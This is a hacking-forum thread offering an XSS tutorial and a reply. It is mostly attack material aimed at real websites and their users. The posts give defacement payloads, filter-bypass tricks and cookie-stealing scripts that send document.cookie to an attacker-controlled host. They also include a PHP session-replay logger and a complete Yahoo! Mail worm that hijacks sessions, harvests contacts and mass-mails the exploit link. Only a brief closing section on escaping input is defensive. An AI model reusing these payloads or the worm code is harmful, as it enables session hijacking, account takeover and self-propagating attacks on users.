Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: XSS Tutorial ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps
Sujet précédent :: Sujet suivant  
Auteur Message
4l3x
Administrateur
Administrateur

Hors ligne

Inscrit le: 04 Nov 2009
Messages: 96

MessagePosté le: Mar 5 Jan - 09:23 (2010)    Sujet du message: XSS Tutorial Répondre en citant

Complete tutorial on XSS methods.

PART 1

'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
malicous code, There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is 'URL XSS' this means that the XSS wont stay on the page
it will only get executed if you have the malicous code in the URL and submit the url
we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
vulnerable, for example say we found a site with a search engine, Now in the search box you enter
'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker'
ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also
inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
HTML downloads to your pc and then your 'Browser' parses/interprets the code, (thats why its source is viewable)
With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page!


Well to start finding these vulnerbilitys you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's, there are too many to mention.

Using 'Google Dorks' to make the finding easyier, Ok if you wana get cracking, goto google.com and type
inurl:"search.php?q=" now that is a common page and has alot of results, to find out some attacks move
onto the next chapter.

Also note that most sites have XSS vulnerbilitys, its just having a good eye, and some good knowledge
on how to bypass there filteration.


Well now to crack on, and start learning some Actual Methods, the most common used XSS injection is

<script>alert("XSS")</script>

now this will alert a popup message, saying "XSS" without quotes, its easily editable.

So backtracking on the last chapter im assuming you remember we talked about, search.php?q=
well you can simple try the following on a website with the same thing,

http://site.com/search.php?q=<script>alert("XSS")</script>

there are good chances of it working, but dont be worried if it dont, just try diffrent sites.

some other easy XSS (i dont think people realise they can insert HTML not just javascript)

http://site.com/search.php?q=<br>&...</b>

if you see the bold text on the page and newlines then you knows its vuln, then can move on using some
methods explained later on in the tutorial.


Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

ok now if u change the link to a valid picture link, and save it and run it you will see what i mean.

Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it
you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

<script>window.open( "http://www.google.com/" )</script>

There are many others ways that im not going to explain due to how busy i am, Its easy to lookup methods
using google and googleing for HTML tutorials, u can see how to embed Music ect.


I decided to add this has its the most USEFULL method of XSS, and i havent seen any papers, covering it.

first grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Watch your file now for cookies, then you can hijack there session Very Happy

but now you ask what if my site hasnt got, this kind of attack, it only shows data once and dont
store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it
and maybe hex, base64 encode it so people cant see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

PART 2

Alot of sites may seem vulnerable but not executing the code, well to solve this take note of this chapter.

Some common methods to bypass filteration is

')alert('xss');

or

");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS
before.

Some other ways to bypass filteration

<script type=text/javascript>alert("t0pP8uZz")</script>
<script>alert("t0pP8uZz")</script>;
<script>alert("t0pP8uZz");</script>
<script>alert("/t0pP8uZz"/)</script>
<script>var var = 1; alert(var)</script>

Read the next chapter for another way to bypass magic quotes filteration.



Ok in this chapter were going to learn about some good techniqes, that i myself havent seen
being used before, but im sure you guys will like it.

ive came across many sites where 'Magic Quotes' is on and therfore rendering some commands useless.

fear not, ive come up with a way using char codes (Decimals), to convert char code to Ascii.

The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here http://www.asciitable.com/

this will help you write what you want, In my examples ill be writing "t0pP8uZz" this is the following code

116 48 112 80 56 117 90 122

Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.

String.fromCharCode()

is suitable for this kinda things, its easy to setup, im gona give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

Ok now "String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)" Is a JAVA (ASCII) way of saying

t0pP8uZz

and to use this with alerts ect, you dont need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

Ok now this will display or message in this case "t0pP8uZz", this method is very usefull for
bypassing magic quotes and maybe some custom escaping of quotes.

Ok before i move on i wana talk about another method useing variables. lets declare one below

var myVar = 1

ok now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following

<script>var myVar = 1; alert(myVar)</script>

and this will display the variable contents again without using quotes.

There are many others methods, that im not going to talk about, XSS is a simple Attack.
and from here you should know what you need.



Ok this was written for WebDevelopers (yeah right..) so im gona talk about how to secure your code.

if you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}

Ok say the variable $_POST['from'] was coming from a input box, then you have a XSS attack.
the following is a very easy way to secure that.

$charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);
if(isset($data)){echo "<html><body>" .$data. "</body></html>";}

now that will take all possible code and make it not executable. by turning it into stuff like
&lt; ect...

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET['id'];
echo "you are viewing " . $this . "blog";

now if we include ?id=<script>alert("XSS")</script>
into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET['id'];
echo "you are viewing " . $this . "blog";

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said.


Revenir en haut
Publicité






MessagePosté le: Mar 5 Jan - 09:23 (2010)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Karl
Membre
Membre

Hors ligne

Inscrit le: 23 Nov 2009
Messages: 108

MessagePosté le: Jeu 7 Jan - 05:28 (2010)    Sujet du message: XSS Tutorial Répondre en citant

Okay

Une autre approche des attaques XSS:

1. DESCRIPTION

Using Cross Site Scripting ( XSS ) attack's give's us the possiblity to impersone one legitim user ( victim ) that is a registered on a website ( target )

In this tutorial will suppose the target site has a XSS vulnerability which give's an attacker to inject a "bad code" into a page.

First, let's follow this step's :

a. The victim certify's on the target site
b. The attacker send's a link to a page ( with the "bad code" ) from the target site to the victim
c. The victim navigate's to the page
d. The page code load's a script from another location sending the victim's cookies
e. The script use's this cookie to act like the victim on target site

I'll illustrate now ( with example's ) :

We suppose the victim is allready certifyed on the target site

The target has a XSS vulnerability :
http://www.target.com/page.php?var=

The attacker send's the link to his victim :
"http://www.target.com/page.php?var="

When the victim follow's the link; the script "js.js" is loaded and executed by the browser

===== js.js =====

new Image().src='http://www.attacker.com/php.php?cookie= '+escape(document.cookie);


=================

The file "js.js" contain's a code which does a request to the file "php.php" - controled by the attacker.

===== php.php =====

$domain=".target.com"; // cookie domain

$cookie=$_GET['cookie'];

//we create the file , supposeing the cookie session has more sequence's "name=value; "

$hcook=fopen("cookie.txt","w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value=substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// we make any curl request useing "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR



The "php.php" file is esential to this kind of attack.

This steal's the victim's cookie and use's it to look like the victim on the target site. The reason for useing a php script in place of a javascript is to pass the javascript polics, haveing the possibility if requesting to anykind of domain where the cookie is valid. We can receive and send data to the target site and manipulate in any kind of mode.

2. YAHOO! MAIL Worm PoC

Will suppose that Yahoo! has a XSS vulnerability like the following form :

"http://xxx.yahoo.com/page?var="

a. The attacker send's an emails containing the link to http://xxx.yahoo.com/page?var= to the victim
b. The victim follow's the link ( Ok, pause. Let's name the victim BILL )
c. "worm.php" file is stealing BILL's cookie and useing it to send a mail to every person from his Address Book
d. The person's from BILL's Address Book become victim's when they follow the link from the email, which seeming to come from a victim

===== worm.php =====

$subject="Link for you"; // message subject
$message ="Look a cool link, CLICK ME!"; // message body

// We eliminate the need of a "js.js" file checking the parameter value of "cookie"
// If this doesn't exist we type the content of "js.js" file
// and if exist's we continue with "php.php"

if(!isset($_GET['cookie']))
{
$scripturl="http://".$HTTP_HOST.$REQUEST_URI;
print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);");
}
else
{
$cookie=$_GET['cookie'];

// We create a unique name for the file were we'll save the cookie ensureing this way
// that when a lot of victim's access simultaneuously the script; the cookie's will not overwrite
$cookiefile=rand(100,999).".txt";


// we create the cookie file

$hcook=fopen($cookiefile,"w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value= substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// We try the Yahoo! address book for data extraction all about the contact's and create a variable of the form
// "contact1@yahoo.com,contact2@yahoo.com, etc.." as well finding the domain us.fXXX.mail.yahoo.com
// which change's each time there is a certify!


$address=curl("http://address.mail.yahoo.com/","",$cookiefile);
if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly
{
$apage=explode(" ",$address);
foreach($apage as $line_num => $aline)
{
if(strstr($aline,"ymsgr:sendIM"))
{
$ex =explode("?",$aline);
$ex2=explode(""",$ex[1]);
$id=$ex2[0];
$to=$to.$ex2[0]."@yahoo.com,";
}
if(strstr($aline,"Compose"))
{
$ex3=explode("/",$aline);
$domain="http://".$ex3[2];
}
}
}

// We load the "Compose" formular situaten on us.fXXX.mail.yahoo.com for finding the formular's action
// to send email and parameter value ".crumb" which we need for sending message's


if(strlen($to)>0 && strlen($domain)>0) // if we have the 2 variable's
{
$compose= curl($domain."/ym/Compose?","",$cookiefile);
if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly
{
$cpage=explode(" ",$compose);
foreach($cpage as $line_num => $cline)
{
if(strstr($cline,"form name="Compose""))
{
$ex4=explode(""",$cline);
$action=$ex4[5];
}
if(strstr($cline,".crumb"))
{
$ex6=explode(""",$cline);
$crumb=$ex6[3];
}
}
}

if(strlen($action)>0 && strlen($crumb)>0) // if we have the 2 variable's
{

$subject=str_replace(" ","+",$subject);
$message=str_replace(" ","+",$message);

// we generate POSTFIELDS for curl

$post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&";
$post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&";
$post.="box=&.crumb=".$crumb."&";
$post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&";
$post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&";
$post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&";
$post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&";
$post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&";
$post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&";
$post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&";
$post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&";
$post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&";
$post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&";
$post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&";

// sending the mail's
$mail=curl($domain.$action,$post,$cookiefile);
}
}
unlink($cookiefile);
}

function curl($url,$post='',$cookiefile) // function to easy the curl request's
{
$rand=rand(100000,400000);
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
if($post!=='')
{
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
}
curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);
curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$result=curl_exec($ch);
curl_close($ch);
if($result=="") { curl($url,$post); } else { return $result; }
}

?>


Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 17:07 (2017)    Sujet du message: XSS Tutorial

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> WebApps Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Portail | Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com